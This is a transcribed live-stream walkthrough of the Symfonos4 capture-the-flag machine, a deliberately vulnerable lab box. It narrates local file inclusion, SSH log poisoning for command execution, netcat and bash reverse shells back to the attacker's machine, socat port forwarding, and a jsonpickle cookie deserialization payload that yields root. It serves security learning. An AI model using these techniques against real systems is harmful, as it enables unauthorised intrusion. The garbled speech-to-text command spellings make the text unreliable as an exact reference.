Symfonos4. Alright, let's start off with a make directory for Symfonos4. We'll cd in there. Oh. And we'll go ahead and we will start up our mmap. Attack SN, see what PZ is actually at and stuff like that. And let's go ahead and start up an mmap scan on 36. Now I'm going to go with Symfonos 5, it's probably going to be 37. So it looks like just 80 and 22, a little bit different than what we've seen so far. So let's go ahead and do an mmap scan, attack P on 22, just to make sure that nothing crazy is going on there. And also port 80. And that's a new one. Don't really need to worry about that. And we'll start up a Go Buster, I guess, on port 80. Don't need CGI bin anymore. 36. And we're looking at 2.4.38. And hopefully this isn't a JavaScript one, because I'm not very good at JavaScript. So hopefully it's not that. And we'll see what we got here. Right now, so far, nothing yet. Let's go check out the webpage. And also make a little thing in here too. We got the mmap. And we'll go check out that webpage also. Alright, same as that kind of thing that we've been seeing. Nothing in the source or anything like that for it. We got /gods. That's a new one for us. Oh, man. There we go. Our mmap scan, right? Well, that was our attack. Whatever. Okay, our mmap scan. I don't know why I just did that, but that's okay. And then we did a Go Buster. Directory boot buster, whatever you want to call it. We got gods in here, so we're going to have to look into that guy right there. And we'll continue from there. If you guys don't know, go check out DZ. He's, let me see here. I think I can do that one thing. 1 second. He's a super good, he's not out here anymore, but he's super good at, he's extremely good at web stuff. I know that. He is very good, but yeah, his streams are a lot of fun to watch. Stuff like that. Let's go ahead and do /gods. We got Hades, Poseidon, and Zeus. Let's go ahead and just open them up. Just kind of gives us a little bit of a background on Hades. Okay. Poseidon. A little bit of background on Poseidon. Divide of creation. And Zeus. And we get a little background on Zeus, it looks like. Alright. Let's go ahead and do a... it's also going to /logs. So that might be something like right there. We did a recursive lookup, didn't we? Let's try /gods just to make sure. Might be something that CGI bins again. We don't know. Hopefully nothing crazy going on here. We just have our logs so far. I'm not seeing anything else. Let's try a Go Buster, Dirtac U, recursive. Let's throw some arguments in there. So we got that /logs, right? Let's do .logs, comma, or logs, back, PHP, HTML, zip, text, gunzip. Let's try something like that. Oh, well, I do attack X for that, huh? Because we're not finding on 36 also. I'm lost. I'm lost. You can tell I've been streaming for 6 hours, huh? You get 403 on that. I'm still going to check it out, even though we get 403. We should have seen it everywhere else so far, but we'll try it. See what we got. Yeah, forbidden. Okay. C.ph. Okay. So let's try to check that out. /c.php. I don't know why I said ph. Username. Oh. Notice what the file's doing up there. Did you notice that? It's pulling it down from some type of log file, and it's calling for file. So you might be able to do something with that, like right there. And we're getting this like right here. So it looks like we have maybe some type of local file inclusion. Okay, nothing with that. Make sure nothing's happening. Okay. Or it's going to be blind. Like a blind injection or something like that. You know what I'm saying? It could always be something like blind injection. But we're pulling log files, right? How are log files? No. Yeah, var has log files. We're looking at .log files. So it almost seems like it's running in. It's not. Okay. Var log Hades. Nope. Okay. We also have Atlantis.php here too. Oh, that's all about. /Atlantis. I've been here before. Same exact thing. Oh, Atlantis brings over to C.php. Okay. So it's doing the same thing. And we're in the log files, right? We think we're pulling a log, right? How do we... We're in log files. Let's go ahead and intercept this with Burp Suite and maybe do a... Oh, whoops. Got another idea. I'll send that to the intruder. Clear that out. We're going to take this guy like right here. We're going to have that attack, right? We're going to go payloads, load. We're going to do a local file inclusion. Sure, why not? I don't know how much he's actually looking at there. But I want to load some more than just that. He's got a lot of crap in his. Let's go ahead and throw that at Star Attack. What we're looking for here is the length to change. That's what we're looking for in something like this. So, look here, we look at the response. Select a god, Poseidon. It just keeps telling us select a god, right? So, obviously this is the first one, and we got this whole thing right here. So the length is obviously changed. And that's what we're looking for like right now, is for that to actually change. Now what we could do to speed this up like a little bit is we could use zap. I've never really done local file inclusion with zap. We could actually might even be able to use fuff. And then get rid of length 878. I wonder if we do something like that. That would be pretty cool. Wouldn't it? Because we do something like with fuff, right? Fuff, attack you. Let's go ahead and CD back into my guy. Desktop try Acme 24 hours hacking stream, Symfonos4. And we're going to go ahead and do a fuff. Attack you, right? That guy like right there. What if we got to add in cookies also? I feel like we also have to add in some type of cookies, right? How am I going to do it for? I guess just be able to now just do a. Cause we're not gonna do the header right there, that right? We're going to. We don't want the header right there, that. We want to fuck just this probably right here. Okay, let's go ahead and grab the word list. Tac W. User share word list sec list. Fuzzy, right? And then LFI. And let's do that one like right there, because that one had a lot more. If we want to do it for I guess the host. I guess we would do the host, right? So we're going to do it for Buzz. Okay, so we completed super quickly. We got a lot of status 302s in there, huh? Other ones give us a lot of status 200s. We got a lot of status 302s in there. Because we're not authorized to be in there. That's why. Can we do cookies with this thing? Can we add cookies in this guy? In the fluff? Cookie data. Okay, so tag B, we need the cookie data. Some of you don't have a session right there with it, like right now. Let's go ahead and stop that. Some of you have no cookie data. Okay, there we go. So we need for the cookie data, we need name equals value 1, name equals value 2. Copy is cool. So we need the name. PHP session ID, and then the value. All right, so we're going to be tag B, the name, which is going to be that, and then the value of it, which is this guy right here. He didn't get anything else, so he's got a lot of 302s again. So he's not logging in. Damn. Let's go down over here on Burp Suite. Anything? What are we down to like right now? Man, that's gonna take forever. I think I did that right. For the cookies at least. Cookie data name. Okay, I might have to actually do it like this. A lot of 302s again, huh? All 302s again. So I'm not getting that guy. Or at least I don't know the syntax for it. How about that? Supposing my cookie like right there. Do host. Nothing. Huh. Okay. So posing that guy with this thing. Yeah, it's not really the header. It's not really posing it right there though. Nothing there, huh? It's all 302s again, isn't it? Yeah, every single one of those are 302s again, it looks like. Damn. var authorization folder. It was var log, right? Log authorization folder. And var logs my logs, but that's not it. Auth.log, is that a thing? Let's find out. var log auth.log. No, var log auth. Okay, var log auth is something. All right, so we got somewhere. Okay. So we got something now, at least. Var log auth gave us something. What can we do with that? Anything in here? No, it's not looking like it, at least. Okay. So at least we found something, right? We do that? Or do we have to send it up there first? Probably have to send it up there first, huh? There's nothing in there that's telling us that that worked. Okay. So we probably have to do something with... How are we going to do this? Can we curl something to it, I wonder? See if we get something with var log auth. Let's do that one like right there. I want to try the other ones. Something like this. But I feel like I need to have the username and password there also, right? Oh, that worked. Yeah, I didn't think so. Hold on. Wasn't there before, was it? Yes, it was. Okay, never mind. I got excited for a second there. I was like, whoa, wait a minute. Whoa. Okay. So we should be able to poison that and be able to run some type of command to get it back, right? That's what I'm thinking. How? Do we even have to poison that whole thing, or can we just send it just to here? That's not going to work, but you always got to give it a try just in case. Yeah, okay. Can we poison it through SSH? With, something like that. And then put that into, what is it? The freaking IP address? And see if we get a log. Okay, we just got more in there. So yes, something has happened. Did not receive identification string. So yes, we can. Okay, so we can mess with this log like right here. Now, how in the hell did we put it in there? That's my question. Is did we actually put it in there now? Because if we can, wait. If we did that and mess with it, can we do a freaking just like the command like straight up like? Should this be like a who am I? Can we do something like that? We got more. www data. There we go. Let's go! Alright, we just found out that we were www data. I don't know if you guys saw it down there or not, but we look at right here and we're www data. Okay. So yes, it's logging the connections that are being made to it. So we have that, and then we go over to this guy over here, and we can see that we have this. So we're logging the connections being made to it. So we know what that's working like right now. So now I feel like we could just send up like a reverse shell and it would log it, but really it would actually run it. You know what I'm saying? Something like that. You can always try netcat-tech-e. I mean, I don't know which one's going to work. Netcat-tech-e or maybe the regular one. How are we going to do this? Because now we need to make sure that it calls back to us, right? So how in the hell are we going to do this? Can we send a command at it? Can we actually do like a PHP system command at it or something? I don't think we need a get command. I don't think. Maybe we need a get command. Will this actually work? Does it actually run that? I don't know if that's old or new. Failed password for a valid user. Okay. Let's go ahead and fail the password again and see if that gets bigger. It does. Failed invalid user, www data. Okay, so we are running commands, and command in here is working. That who am I? That is working like right there. Because if I don't do a who am I, right, and I just do it like this, we shouldn't see all. Oh, okay, we do. Can I still try like a and command equals which bash? User bin bash. So yes, that does work. Okay, cool. So we can send up a command. We can send up this like right here, thus allowing us to be able to then execute commands on this guy over here. So he's running that PHP get command like right there. So he's allowing us to run those. And as we can see, there's user bin bash. iframe with PHP stores? Sure. I don't know what this is actually called like right here. I know that we have, I didn't know you could do this through SSH either. Just SSH is the only other port that's open. So I was like, well, let's try it. And is that what that indirect frame? Is that what that is? What we're actually doing like right now? But yeah. Yeah, now I think about it, yeah. That's exactly what we're doing. So let's go ahead and try to do a netcat reverse shell now. Back to myself. Right? Let's go ahead and see which netcat first. Let's go ahead and stop this guy over here too. So we'll do a which netcat. Make sure that netcat's actually on the machine. It is. User bin netcat. Alright, cool. So let's go ahead and run a cat scripts netcat reverse shell. And we'll just grab this one like right here because this one seems to usually work better. Because most boxes don't have TAC E on them. We'll do it for TAC MyP to NC, TAC LBMP 4242. And let's go ahead and send that up. And we did not get anything back. Okay, let's go ahead and try. Ooh, let's just try doing netcat TAC NV. Isn't that what it is? It's netcat TAC NV. My P address, my port, TAC E bin bash. Let's try that. So let's go ahead and try netcat. So now what we're doing now is trying to get a reverse shell. Netcat TAC MV 10.00.30 4242 / bin bash, right? No, TAC E / bin bash / bin bash, like that. That's hanging. Let's go! There we go! Let's go! Do a reverse shell. Netcat TAC NV Kali IP listening port TAC E bin bash. Okay, cool. So we made a call back to ourselves pretty much. So now we're back over here, right? Let's go ahead and do a which Python. So let's go in cat scripts full shell. Go ahead and get a full shell on this guy first. Stabilize this thing because we know that once, just because we're in, we know that that doesn't mean anything on these boxes for Symfonos so far. We have yet to get a really easy way to be able to increase our privileges yet, huh? So next term. And we're going to go ahead and do STTY, rows is 25, columns 86. All right. Whoops. All right, cool. So we're in here now. We got it at least, right? Actually, take a print screen of this guy right here. All right, let's go ahead and CD in home. See what else is on this machine first. We got Poseidon. Let's see if we can get into him. We can. Okay, nothing in there. All right. Let's go ahead and do a sudo tech L. See if www.data can run sudo for some reason. Sudo command's not found. We're pretty used to seeing that so far. Let's go ahead and do a scripts SUID lookup. So far we've had, let's see here, we've had to do port forwarding, right, on Symfonos, right? We've had that. We've had, what is it? Thank you very much, Fliposo. Thanks a lot for the follow. Oh man. So we've had to do port 40. We've had to do, what else? That's about it, isn't it, so far? Like the weird stuff. So let's do an SS. Is there a better one of these? SS TAC TULPN. Tolpin. There we go. So we got port 80 up. 8080. Okay, so we got another port 4, it looks like again. Gonna have to do something like that again. 127, and we also have a MySQL up too. So we've tried MySQL. TAC U, root, TAC T. No password. Okay, nope, that doesn't work. Root. 4. Nope, okay. Let's go ahead and get limpies onto here. Start up our web server, wget or cd in the temp, wget http 10.0030/limpies.sh. Okay, change mode +X for limpies, and we'll go ahead and we'll run that. See if we get anything in here. We did find port 8080, so we might be able to do something with that. Actually, I didn't even take a print screen of that now, did I? Yeah, I did. Okay, cool. Well, limpies. Alright. Gotta figure out what groups we're in. That was another one. Because we were able to do TCP dump also at one point, weren't we? Permit root login set to yes. Keyring folder. Can't read shadow.back. We're not cracking anything right now. User bin. We do have a couple. Looks like the database, like right there. Okay. So now we gotta start looking at port 40, it looks like. Let's see here. Okay. Let's see here. forward, because last time we just used, what was it? Interpreter, right? So, port forward with SOCAT. What we can do is SOCAT. We can also do it with shuttle, can't we also? Go ahead. We should be able to run SOCAT on. Can we run SOCAT on this machine actually? Okay. Yes, we can. So can we forward a port from this machine back to us? Or have it listen somewhere? Right. I don't think I need to do IP address. I just think I need to get it out of that 8080 because we can't see 8080. That doesn't exist to us. So SOCAT. Jesus. SOCAT, and we want to do a TCP listen, right? SOCAT TCP listen. And oops. SOCAT TCP listen, and we're going to listen on a different port, right? So we'll say SOCAT TCP, it's definitely lowercase, TCP listen, and I believe it's like that. 8081 we'll say. Comma fork, right? We're not putting in a new address. Should have paid more attention in Wreath. Reuse address SOCAT. There we go. Reuse address. There we go. Tips and tricks. Okay. Use remotely a command shell. Okay. Well, we don't want to do that, but reuse address. And we're going to fork reuse address, right? So both of those guys, because we're going to be using the same address, right? So let's go ahead and do it like that. How they say in the tips and tricks or whatever. And then what are we going to connect to, right? Yeah, localhost 8080. So is a TCP just connect localhost 8080? TCP listen. TCP. Localhost 8080. So now if I go to 8080, let's go! There we go. 8081's up like right now. So that means that this command like right here worked to be able to forward from 8080 to 8081. now we forwarded port 8080 on the local host to also be 8081 and listen for connections, which is shown right here. I'm really hoping that Symfonos are the harder ones of this group. Because if not, we are going to be in a rough... Let me see, I got quite a few hours left. Okay, so there we go, right? So now we got that. So now we need to go and get over into 8081. Let's go ahead and do that. Stomach's growling. Might have to actually eat after this one. 8081. Who am I? That's weird. Okay. What if we can do a go burst on this guy now? We do that. 36 on port 8081. Can we do that? Is that like a thing? Or are we just going to break him over here now? So how's it going to happen? Okay, so we get this who am I thing, right? And it definitely says freaking cookie set Poseidon. So let's go into a F12 and let's see what the cookies are. Username is that. I wonder if that actually comes out to be Poseidon and base 64. Okay, so yeah. We got Pi project, apps user, username, Poseidon. Okay. So cookie set that. We get this thing right here. Let's go ahead and grab that guy. We have an HTTP only of false, so we could technically use someone else's cookies to be able to log in as them. So if we were to change Poseidon maybe to Zeus, what if we were able to do that? If we were able to take this guy, base 64 in. Can we do this? Whoops. Can we do that? Right. We're going to echo him. Well, I should just use CyberChef for this, huh? Okay, we'll echo that. And what we're going to do is we're going to say base 64. Right. Now let's undo him. And okay, it's still Poseidon. Okay, cool. Now what I want to do is I want to make it Zeus now. Because we know that we saw three guys in the beginning, right? We saw Zeus, Poseidon, and I forgot who the hell the other one was. Hopefully it's not him. Alright, let's go ahead and echo. Well, no, there it is. Okay. So let's try to throw that into the user, into this session now for our cookie and see if we can't change who we are. Zeus. Okay, so we can. We can change who we are with the cookies. Alright. So, cool. Let me show what I did over here. Okay, so now that we know we can change users with a cookie, now we need to... Oh, man. What if it's just running whatever the hell? You know what I'm saying? Let's see, what is that code running again? I was more looking at the cookies. Pi object, app user, username, Poseidon. Okay. Can we do anything else with that? What else can we do with that? Pi object. What can we actually do with that? I wonder if we can like do like some type of like command injection into it. But I don't know what we would actually put in there. What system and then like command? I have no idea. What would we even call this like right here? Application user, so it's JSON formatted cookie data using Python. Import OS, something like that. This input would cause the application to call OS system and spawn a reverse shell back to the IP on this port. So if we were to just to base 64 that, can we just put that whole thing in there and pretend like that's correct? We're going no, but we're going to try it. By God, done dumber things today. Well, I echo that into base 64, right? It's probably not going to do it. Okay, let's just go ahead and grab this whole thing like right here. And we're going to go over to Cyber Chef. We're going to see what happens. Let's see what happens. And we're going to say to base 64. And there we go. Can we just throw, and that's listed on another port. One. And can we just throw that into here? Internal server error. Okay. Well, at least it tried to do something, right? Yeah, that did not work. Okay. But it tried to do something. We know that. I'm thinking I have like this stuff all wrong. Everything like that. Web shell? Is that a thing? Right? Isn't web shell a thing? I think I still need like Pi object. I think I still need crap like that though. I think I still need to call for everything like that, but let's go ahead and give it a try with just web shell. Sure, we can figure it out now that we kind of got somewhere with it. Who knows how long it's going to take us to figure out. No. Alright. I feel like we actually need a real... I think we still need to call PyObject, right? And then... Oh, man. Let's do... I don't know Python well enough. I don't think we'll be able to complete this box, but we're going to try it. Do something like that. And then main shell. Yeah, that's kind of what I figured was going to happen. If we do PyObject, PyObject, that thing, main shell, OS system. I don't know. I don't know Python good enough for this kind of stuff like right here. If anyone knows Python, please let me know. What can I do with this? This one we may have to look up because I don't know Python. I know that we can mess with the cookie. I just don't know what we can do with the cookie or how to mess with it. I guess with the Python programming here. Nope. Damn. Really thought I was going to get that one like right there too. Okay. Oh, I didn't think so, but you know. Thought it was more of a chance than what it was 10 minutes ago. Alright. Let's go ahead and do a OS system like that. Alright, there we go, OS system. And then try to bash him in there. Is it import? That's not right. Whoops. That's not right at all, though. Oh, probably because I'm doing it over here. I'm actually doing it over here, aren't I? That's probably why. Is it main shell? OS.system? Isn't that kind of how I did it? Something like that, OS.system? I need something like that or something. I don't know what. You know, honestly. Let's try something like this. Oops. Not that. Yeah. I don't even start with this one. That's what we want is cookie code execution, yes. With Pi object, right? Cookie code execution with Pi object. Pi object, cookie remote code execution. Let's try that. Security serialization. What's this? Pi object. Let's see here. So we have Pi object, and that's all we know so far, right? It's not pickle. Try this. Go ahead and go Python or nano pickle.py. I feel like we need more than that though. Python pickle.py. We didn't even call back to the right people, did we? It's going to be on 44444. We're going to do a bin bash attack I for... Oh, it's going to listen on 44444. That was it like right there? Listening? Yeah, it's not netcat attack E, so it's listening. Okay. So if this works, then we should, port 444 should technically open, I guess. I don't think that's going to work like right there, but you go ahead and do an mmap scan again. 10.00.36. And now 444 is not up. Huh. Okay. We will get this guy. That is on JSON pickle, right? JSON pickle remote code execution. If I can spell pickle correctly, that'd be way better. Pi object, yeah, something like that. That's what we have like right there, something like that. So that's a little bit more helpful, okay. But we need, I feel like we need more than just that, right? Pi reduce, pi type, pi, oh! JSON encoded pickle. Pi object main shell. Pi type subpros p open, pi tuple. Who am I? No, no, no. No, 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 no. Okay, let's try that, like right there. We have to get rid of those no, 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 no's. No, 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 no. Let's try to throw that into CyberChef. Let's see what we get here. Damn, I was really hoping to see a who am I. Let's try to get rid of those no's. I don't know if we need all those. Let's do something like that, I think. There. I think we need one more of these guys. I think we need it like that. Because that guy is going to close out all the way over there. I think we need it like that. Let's try that like right there. Damn! Is this even working anymore? 88, still up. So we have had a problem so far with stuff just dying. We haven't had that problem. The server's overloaded, or there's an error in the application. I think I need let's go ahead and shut off that SoCat. Let's go ahead and do it again. For 8082 this time. Let's see if 8082 actually comes up. Okay, 8082 came up. Okay, cool. So let's do 8082. I wonder if any of those, no. That didn't work. That's not good. So I'm wondering now if the box broke again. I'm going to go ahead and grab this whole thing then, if that's the case. Because we're going to want that whole thing for our HTTP part of it. So let me just copy and paste that back in. Let's go ahead and shut the box down, and we'll open it back up again. It seems like it may have, because this happened to us on another Symfonos machine where we were attacking a web server. If we messed it up, it pretty much just shut the thing down. So oh man, we still have Symfonos4 left also. That's horrible. Okay, let's go ahead and do a mmap scan. Let's see if he's actually open. He is. Okay, cool. 22 and 80. That should be it. All right, cool. That's good. Stop this up here. We'll start up a listener again. Oh god. Oh god. Oh god. What was I listening on? 4242. Go ahead and grab that again. And let's do an NC tag LVMP 4242. And should close that guy actually. There we go. And we're gonna go ahead and we're gonna try this one more time. Or a few more times probably. Refresh that. Should have gotten a callback. We should have gotten a callback up there. Maybe because we never logged in. slash gods, right? Wasn't it? No, it wasn't gods. What was the other one? Slash Atlantis. And then we logged in with just some bullshit, didn't we? What did we log in with before? Oh, we logged in with SQL injection before. Why are we not able to log in this time? Okay, there we go. So we select the guide, we got whatever, okay? And then we'll go ahead and we'll throw it wasn't that one that we did. It was the right here. Alright, we did that bin bash, right? We are listening, so let's go and throw that into there. There we go. Alright, so we get that callback right. Cat. Scripts full shell again. We're going to grab this one right here. And let's just go ahead and go straight in that SOCAT now. Where we did our SOCAT port forward, right? We did our drop this guy down like a little bit. We did SOCAT TCP listen on port, we'll say 8083 this time. Reuse ADDR fork TCP localhost 8080. Okay, so he's listening now, right? So if we do another nmap scan, we should see 8083 up. Yep. So now we should be able to go into 10.0.0, 10.0.0.36, 8083, and we're getting an internal server error again. So we may have to now totally re-download Symfonos because we're getting that internal server error again. There's something wrong with this one. Let's go ahead and go to slash who am I. Yep, there's something wrong with this one right here. But it might just be because of that, like right there. Might be that. Let's see. Let's go ahead and clear all cookies. Delete all session cookies. Okay. Yeah, there's nothing in there anymore. Let's go ahead and grab this. Hop back over in him. Yep, he's broke. Broke. Oh, there we go. Ayo, let's go! Not broken enough. Alright. So, now we do our F12. And we get the cookie step aside in, and we realize that if we change this out, we can go to different people. Now, let's go ahead and head over to our cyber chef here that we found, yeah, with the tuple and everything like that, right? And then we have who am I. So we have PyObject, right? We have our PyObject, our main shell, right? Our PyReduce. Okay, all that subprocess P open. I'm thinking I'm going to have to change that over to OS system. That's what I'm thinking, like right there, is that we're going to have to change that guy to OS system. And then from there, Py tuple, who am I? let's try to just load this one in here like real quick, because I don't really know. So we saw one with OS system. We saw them in a couple different ways now with OS system. I think I might have to do something like that to actually run a command on it. But let's go ahead and throw. So we have username. Let's go ahead and throw that into here. And let's go ahead and refresh this. And we get our internal server. Okay, so that wasn't it. So delete all again. Go back to not a who am I. Okay, so we get another cookie again. All right. So let's try. Because this is the closest that we've gotten so far. Well, we broke it, but. I wonder if I have to actually tell it like command something. That's what kind of makes sense to me, right? Is that what I have to tell it like the command? Pi type, subprocess P open. I don't know how subprocess P open is going to work with who am I. I feel like we have to do something like a OS system. OS system. Pi tuple. Who am I? Let's try that. All right. Let's go ahead and throw that into our username. Damn. What does pi tuple mean? Let's try to throw it in like right here. Instead of actually clicking on someone, let's try to do it like that. Refresh. No. Okay. Whoopsie daisy. Too far back. Okay. Let's see here. What can we possibly do? I don't know what pi tuple is. I also don't know if I need that one like right there. Hey, thank you very much for the follow. Oh, DZ. Oh, you're raiding. What's up, DZ? How you doing? DZ, I need you. You may know how to do this. All right. So I can mess with cookies. I've messed with cookies before. I've done it before. But this is the cookie. I think that's what it has to look like whenever I mess with it. It's utilizing, crap, I forgot what it's even called. Pickle. JSON pickle exploitation. All right, it's utilizing JSON pickle, right? So I found a good article on it, which I think is what I have to do. This like right here. I think it's something like this. Now I'm doing a OS system on here. I don't know what the hell pi tuple means, but I don't think I need it. But it's Symfonos4. And I don't think I need that tuple on it, but I don't know what the hell tuple actually means. But I feel like I need to call for a function, right? That will open up a function. A function that will open up pi tuple is referencing a Python data type tuple. Okay. All right, now we got Monte Carlo in here also. This is going to be a good time. Okay. All right. So I'm trying to base 64. So look, I can mess with this cookie over here, right? I get cookie set beside it. I go to main page, right? I have this sweet cookie, okay? If I dehash this, right? So let's go ahead and dehash this guy. Echo base 64 attack D. I get this, all right? So what I've figured out now is that is pickle, I guess. Pickle JSON. All right. Now with the pickle JSON, you can call for a reverse shell. I just don't really know how to call for the reverse shell. But I think it's something to do. So instead of pi-tuple, we should probably call for like a function, right? I also did OS. So I also have OS system up here now. But shouldn't we call for like a function? Then? So instead of pi type, what's up, Sid? How you doing? So instead of pi type, should I call for a pi function? Go to the operating system, right? From there, can I just do a who am I? And then, I don't know. I'm not smart enough for this. Who am I? The last one had null, a bunch of nulls in it also. So should we put all those nulls in there again too? Maybe? Maybe I'll mess it up because I'm not putting all those nulls in or something. So this one right here had who am I? Bunch of nulls. Okay, let's try that like right there. So it had who am I? Boom, comma at the end there. Bunch of nulls. Okay. So this should return. See, decoded cookie received. Yep. So the decoded cookie is right here. And it's not OS system. It's not. Okay. That's the decoded cookie. I can change. I've already changed this to like Zeus, sent it back up there, and did it like that. So you're saying pi reduce, pi type, subprocess p open, pi tuple, who am I? No. That's what we tried at first, and we broke it. Here, I'll copy and paste that in there. But yeah, that's why in the very beginning, I just copy and pasted pretty much what the one guy had for who am I, and I think we broke it. But let's go ahead and let's give it a quick shot again, just to make sure, because it might have already been broken from the other times that I did it, because I realized I have to delete the cookie every single time and then refresh the page if I mess it up. So it might just be that I'm just an asshole. Okay, so we put that cookie in, enter, refresh the page, I should see who am I. And I get an internal server error. So if I delete cookies, delete all session cookies, come back over here, boom, get who am I again. I'm back to here again. So that's why I was thinking it was OS system, but I don't know. I have no idea like what the hell I'm talking about though also with all this stuff. Let's go ahead and do that. No. Damn. Okay. Whoops. Delete all cookies. Enter. Uh-oh. DZ's gonna think. We did just tie in King of the Hill. Out of pure luck on my part. Out of the easiest one to get into. He got into something I couldn't get into it at all. I get into the easiest one and end up finding a flag with like 30 seconds left. So, what box is this? This is Symfonos4. Right there. Symfonos4. Okay. And we are also forwarding stuff again. But this time we use SOCAT because that's how we roll. Alright, since we already used Metasploit, we decided we'll let you use SOCAT this time. Should I be doing this in Burp Suite also? Like with the decoder? I should probably be doing some shit like that, right? Let's go ahead and refresh this guy. Let's catch him in Burp Suite and start working on him in there. Maybe you won't get that internal server error sometime. So let's go to proxy. Boom, boom. Hey, if you guys want to watch stuff like built and things like that, like a lot of what is it, soldering, things like that, check out Sid Hearsay. If you guys want to watch someone much better than me at this stuff, check out DZ. Alright. He's especially with like web application stuff. Check him out. He's really good. Alright, so let's go ahead and catch this in Burp Suite now. There's the cookie. Right, let's send it to the decoder. Right, so now I should be able to decode as, or smart decode? What does that do? I don't know what you do. I want to decode you. Never actually decoded stuff. Base 64. Oh, I don't want that. In text. Oh God. Oh God. Oh God. Okay. Go away. I want this to be the only thing that's decoded. Send a decoder. Try that again. Alright, I just want you to be decoded, and then that's it. Everything else can stay the same. Okay. Just put the bit you want to decode in there. Oh yeah, I could do that too. That's a much better idea. Alright, can I get this any bigger? No. Alright, but there it is. Same exact thing that I decoded over on the other one. Try that. OS system, who am I? Okay, will do. Will do, boss. So saying try that. Okay, and then let's hop back over into Burp Suite. Let's go ahead and throw that into here. We'll encode that, right? Otherwise, did all that. That was way more work than I had to do. So decoder, encode as, base 64. That was way more work than what was needed. So that's good. Should I send this to the repeater and just keep working on it like that? Oh, I sent it to sequencer. Send to repeater. Send. Internal server error. Either service overloaded or there's an error in the application. Let's go! Pi function, OS system, pi reduce, pi object. An internal server error is not necessarily actually indicated that payload is not working. Yeah, payload may be working. I'm just hoping that, so what you're thinking is just to send a freaking reverse shell at it? Just say, hey, I don't care. Just try to do a reverse shell. And we'll listen back over here for it. Oh, I got a listener up on 111. Scripts. Netcat reverse shell. Try this guy first. That's the easiest one. I don't even know if he even has netcat tacky on there, but we'll find out. So your thing is do this. Something you can detect whether that pings your host, connects, touches, or file on this. That's not a bad idea. Like try to download something. That's a good idea. Like W get something. See, you guys, you guys are fucking geniuses. Like W get pickle.py. See now. Or do we just go for it? Nothing back there. Let's go. Well, I didn't even. That's obviously not going to work. Good job, Ryan. I did a great job with that. Let's go ahead and throw this whole thing. That worked wonderfully, didn't it? Right click, send to decoder. Go to the decoder. We'll encode as base 64. We'll go ahead and we'll put that guy back on there. Control V. Send to repeater. Send. Damn. I do not know the path of webroot. No, I don't know the path to it. Right now we're doing, right now we just tried the reverse shell, but it's with netcat. I mean, there could be a lot of different things going on with that. What about just like we'll just do like a cat /scripts bash reverse shell. Let's try bash reverse shell. Something easy. 1 10 0 0 30. Let's go ahead and throw that into there. This sounds good throwing right into Cyber Chef. Make my life a little bit easier here. Oh shit, I also sent it to the wrong fucking people. So that's not going to work now, is it? I did it to 36. Obviously, it's not going to work like right there. At least that's how I did it 36. There we go. Control C. And head back over into here. And we'll go back over into our burp suite. Repeater. Let's go ahead and try to throw that into there. Send. Let's fucking go! Holy shit, dude! Wow! Sorry, eardrums, if anyone's wearing headphones. DZ's usually wearing headphones. He's probably never going to watch the stream again. He's probably, fuck that, dude. That hurt. I am sorry. Alright. So we got a call back. Let me go ahead and show what actually happened here. So we did this. Let's throw that into down here. Then we're going to say cookie manipulation for pickle JSON. All right, we did that. From there, we then did a make sure. Oh, and we're root. Fucking easy day, bro. Easy day. All right, sweet. And then from there, we threw that into burp suite, into the repeater right. Boom. Request page. and we get a callback. That was freaking sweet. Thank you very much, Monte Carlo and DZ64. Please don't replace nulls with zeros. Sorry. Try sudo Python. Yeah, we already had a host up and running. I think it was up here, something like that. We already had one for a web server, stuff like that. All right, cool. So we got that. Let's go ahead and let's get into root, and then we'll grab our root.txt. That should be everything, right? Let's print screen that. Boom. We'll root. And we'll throw them into here. And we'll go ahead and do a cd and /root cat proof.txt. And we got that one. I'm taking a print screen of that one. That one took a minute. Sweet. Oh no, I think it was just because I kept getting the internal server error. Monte Carlo, then he was like, hey, that doesn't mean it's actually bad. So it could still be working. It's just I'm an asshole pretty much. When first trying, I continued to get a 500 internal server error. This does not mean the payload did not work. We didn't do a NC Techie, did we? Whatever. I know that we do. I know what we did now. So it's okay. So that's pretty sweet. However, we are just not seeing output. From there, we tried a rev shell, and it worked. Another idea is to have a Python server and get a file and see if you get a 200 on your Python server. All right. Awesome. Let's freaking go. So what I say basically. Yeah. Yes, DZ. Yes. Yours and Monte Carlo's minds combined, we were able to get through that guy. That was freaking sweet. Like I said, if you guys want to learn web application, man, follow DZ64. I don't know, Monte Carlo, do you have a stream? Do you stream at all? If so, I've not seen you on GitHub or stream the GitHub thing for it. All right, let's go ahead and shut him down. We still got one more Symfonos to go through for this thing. There's still a Symfonos 5. And they have been getting more and more difficult as time has gone on. So, I have no clue. Varying frequently? Okay. All right. What do you mostly do? Do you mostly do like web penetration testing, some of that? What's that research on low-key stuff on stream? Yeah. All right. Symfonos 5. All right. Hey, I'm taking a quick 5-minute break after that one. That was rough. Apps like Penta, yeah. OSCP, OSWE. Yeah. I'm more the internal Windows stuff. So, you know. Not the I know how to do JSON pickle attack with cookies stuff. The only thing I know is that you can replace a cookie if HTTP only is set to false, and we can replace a cookie with someone else's cookie. That's allowing us to do that, and we can dehash cookies to find stuff. So, I'm mostly, you know, I like PowerShell, which most people don't. But on Vault Hub, obviously, we're not doing too much PowerShell. So, Symfonos 5. So, let's go ahead and let's look at Up here, I'm just going to make a directory, fire this box up. Yes, I will make sure to change the network interface first. Symfonos 5. Going at it.